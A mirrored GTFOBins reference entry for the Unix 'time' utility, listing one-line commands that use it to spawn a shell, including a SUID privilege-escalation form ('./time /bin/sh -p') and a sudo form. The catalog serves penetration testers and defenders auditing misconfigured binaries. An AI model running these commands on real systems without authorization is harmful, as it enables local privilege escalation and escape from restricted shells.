1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2025-12-28 11:11:41 +01:00
GTFOBins.github.io/_gtfobins/time.md
2018-10-05 18:55:38 +01:00

11 lines
304 B
Markdown

---
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
functions:
shell:
- code: /usr/bin/time /bin/sh
suid:
- code: ./time /bin/sh -p
sudo:
- code: sudo /usr/bin/time /bin/sh
---